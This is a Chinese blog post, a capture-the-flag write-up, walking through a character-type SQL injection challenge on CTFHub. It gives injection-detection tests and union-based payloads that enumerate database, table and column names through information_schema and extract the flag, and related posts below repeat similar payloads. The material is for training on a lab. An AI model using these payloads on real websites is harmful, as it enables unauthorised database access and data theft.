CTFHub - 字符型注入

最新推荐文章于 2024-03-29 19:43:48 发布
最新推荐文章于 2024-03-29 19:43:48 发布
阅读量804 收藏 9
点赞数 7
分类专栏: CTFHub 文章标签: 网络安全 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/have_a_great_day/article/details/132766892
版权

目录

1. 注入点判断

2. 主要关注的问题

3. MySQL 数据库中的注释

4. 注入流程

4.1 初始界面

4.2 判断注入类型

4.3 判断列数

4.4 获取数据库 库名称

4.5 获取数据表 表名称

4.6 获取列名称

4.7 获取数据

 欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。

1. 注入点判断

步骤测试数据测试判断
1-1 或 +1是否能够回显上一个或者下一个页面(判断是否有回显)
2' 或 "

是否显示数据库错误信息;

根据回显内容判断是字符型还是数字型。

3

and 1=1

and 1=2

回显的页面是否不同。(布尔类型的状态)
4and sleep(X)

判断页面的返回时间。

X --- 自然数

例:and sleep(5)

5\判断转义

2. 主要关注的问题

主要关注的问题        解释
回显数据库中的内容是否会回显到网页中。
数据库报错        

数据库报错信息是否会回显在网页中。

提交的数据

3. MySQL 数据库中的注释

注释URL 中表现
减减空格(三个字符) 【-- 】--+
井号 【#】%23
内联注释 /* Zeus */

4. 注入流程

4.1 初始界面

4.2 判断注入类型

        题目已经明了,这面旗是字符型注入。

最简单判断注入的类型:

        根据报错内容,把符号过滤掉,如果报错信息带内容,那么就是字符型注入;如果报错信息未带内容,那么就是数字型注入。如第2张图,灰色扩住的是在输入框输入的命令(1')。

        这就判断出来是字符型注入。

        联合查询和报错注入是最省力的,如果该漏洞可以利用这两种进行注入,优先使用联合查询或报错注入。

判断能否使用联合查询:

        根据页面是否回显内容,回显内容可使用联合查询,不回显内容不可使用。

        如:第一张图。

判断能否使用报错注入:

        根据页面是否回显报错信息,回显报错信息可使用报错注入,不回显报错信息不可使用。

         如:第二张图。没有回显报错信息,那么不能使用报错注入。

4.3 判断列数

        如果猜想不错的话,CTFHub中SQL 板块都是两列。

如何判断:

1' order by 1 #   ----- 回显
1' order by 2 #   ----- 回显
1' order by 3 #   ----- 不回显

第一个 ' 是为了闭合前面的 ' 。
# 号是为了注释掉后面的内容。 

4.4 获取数据库 库名称

        union select 是联合查询语句,使用联合查询语句,需要将第一个select 语句执行错误。

        两条select 语句,如果第一条语句执行正确,则不会回显第二条select 语句内容。

-1' union select database(),2 #

4.5 获取数据表 表名称

获取sqli 数据库下的所有表名。

        group_concat :将多行数据按照指定的顺序连接成一个字符串。也就是获取所有的意思。

        information_schema :在关系型数据库中常见的系统数据库,每一个数据库都会自动生成。

        information_schema:数据库包含了一系列的系统表,提供了关于数据库、表、列、索引、权限等元数据信息的访问接口,允许用户查询和获取数据库结构相关的信息。
 

-1' union select group_concat(table_name),2 from information_schema.tables #

select * from 表名

4.6 获取列名称

-1' union select group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name='flag' #

select * from 表名 where(限制条件) 条件1 and 条件2 and 条件3 ......

4.7 获取数据

     恭喜你!!!

     成功获取flag !!!

-1' union select flag,2 from flag #

或者在URL里用 --+ 备注类型。

 有困惑的地方,伙伴们尽管留言,Zeus会在第一时间进行回复。

懒羊羊安全
关注
专栏目录
CTFHUB-web-SQL注入
ookami6497的博客
11-29 834
CTFHUB SQL
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1248
CTFHUB-WEB-SQL注入
CTFHUB——字符注入
陈艺秋的博客
01-14 514
sql整数注入
CTFHub-字符注入
m0_51589948的博客
05-19 245
字符注入 输入1,2,3 发现只有1,2回显,证明是一个两行的数据库 输入1 order 2 查询字段数 使用整形注入后发现,无法注入成功,考虑字符注入, 可得知数据库名为sqli 查询该数据库下的表名 -1‘ union select 1,group_concat(table_name) from information_schema.table where table_schema=‘sqli’# 得出表名有新闻和标志 查询flag的所有字段名 -1’ union s
CTFhub 字符注入
plant1234的博客
06-16 526
字符注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata s
CTFHub字符注入
sGanYu
07-24 3170
目录 手动注入 sqlmap注入 手动注入 注入是否为字符注入,在输入id=1的时候发现输出结果为id=’1’,判断类字符串形 需要让语句闭合,正常执行,在url结尾输入%23 或者--+,正常闭合,%23为#,注释后面的语句,一定要注意“ ' ”英文输入下,否则容易爆错 判断列数,发现是两列 库名为sqli 爆出一个news和flag两个表,开始跑列名 列名为flag ,查询列内容 【 Mysql表类:在mysql内自带一个数据库,名...
CTFHub | 字符注入
尼泊罗河伯的博客
10-27 1550
此题目和上一题相似,一个是整数注入,一个是字符注入字符注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成。
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7204
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
ctfhub字符注入
09-18
ctfhub字符注入是一种常见的网络安全漏洞,针对的是Web应用程序中的输入字段,攻击者可以通过注入恶意字符实现对数据库的非法操作或获取敏感信息。 字符注入的原理是利用对用户输入数据的过滤不足,未对特殊...
CTFHUB-WEB-字符SQL注入
xixihahawuwu的博客
12-24 337
CTFHUB-WEB-字符SQL注入 我们先就这此题来了解下如何去判断是否是字符注入 如何去判断 1.加单引号,由于固定情况下,数据库此时的语句为select * from table where name = ‘admin’ ,加入单引号会引起报错,页面不回返 id=1' 2.加入 ?id=1' and 1=1 这里就需要加注释来进行绕过 一开始我想使用#来进行注释,结果发现被网页转码了,我们换一种注释–,为了防止再次被转码,我们在–后面加上+ id=1' and 1=1--+ 3.输入 id=
CTFHub 字符SQL注入
Leon~博客
03-14 4266
字符SQL注入 目录 一、判断是否存在注入 二、判断select语句中有几列 三、判断显示的信息是第几列的信息 四、利用函数来收集数据库信息 五、通过union查询数据库 1、获取所有数据库名称 2、查询数据库中有多少个表 3、查询指定数据库中的表名 4、查询指定数据库指定表中的列名 5、查询指定...
CTFHub (web-SQL-字符注入)
m0_64444909的博客
04-29 2606
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 阅读目录一、limit和group_concat查询的区别二、对字符数据的解释三、实战解题步骤1.进入靶场, 一、limit和group_concat查询的区别 1.列出所有数据库 limit 一个一个打印出来库名 group_concat 一次性全部显示 2.列出(数据库: )中所有的表名 limit 一个一个打印出来表名 group_concat 一次性全部显示 3.列出(数据库: 表:)中所有的字段名 limit 一个.
CTFHub-字符注入-wp
z1moq的博客
05-09 188
字符注入 输入1 数据正常返回 输入1+1 ​ 仍返回 ID=1 的值,说明不存在整数SQL注入漏洞 输入 ' or 1=1 # 能正常返回 ​ 所以存在以单引号闭合的字符注入 输入 1' order by 1 # 1' order by 2 # 1' order by 3 # 在值为3时无法正常显示页面 所以页面显示输出字段数为2 输入 -1' union select 1,database() # 获取数据库名 继续输入 -1' union sel
CTFHub笔记之技能树WEB-字符注入
weixin_48799157的博客
03-19 378
小白一个,如有错误还请各位大佬指正! 解法一:手搓 1.输入1和2都有回显,3没有回显,得知数据库只有两个字段。开始构造payload,暴个数据库看看 123' union select 1,database()# 2.发现目标 爆个表名看看 123' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli' #' 3.发现名为flag的表 冲啦兄.
CTFHUB 字符注入
qq_63875498的博客
12-04 212
CTFHUB 字符注入
CTFHUB-WEB-SQL注入-字符注入
weixin_43486981的博客
08-10 478
题目: 靶机环境: 输入1查看显示,1被单引号引起来了 使用单引号’,提前闭合字符 求列数 求数据库名 求数据表名 求字段名 求字段值,得到flag
CTFHub SQL字符注入
weixin_44732566的博客
02-17 3580
CTFHub SQL字符注入 题目说的很清楚,字符注入,需要注意引号和注释 和整数注入一样,回显只有两处:ID和Da,直接上联合查询 123’ union select database(),2 # 得到数据库,接着查表 123' union select group_concat(table_name),3 from information_schema.tables where ta...
CTFHUB--技能树SQL注入{字符注入}
lulu001128的博客
12-03 841
CTFHUB--技能树SQL注入{字符注入}解题过程
CTFHUB-技能树-Web题-SQL注入-字符注入
最新发布
Static______的博客
03-29 509
对于字符注入,可在url中输入。由此判断回显字段为1,2字段。由此判断字段数为两个。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值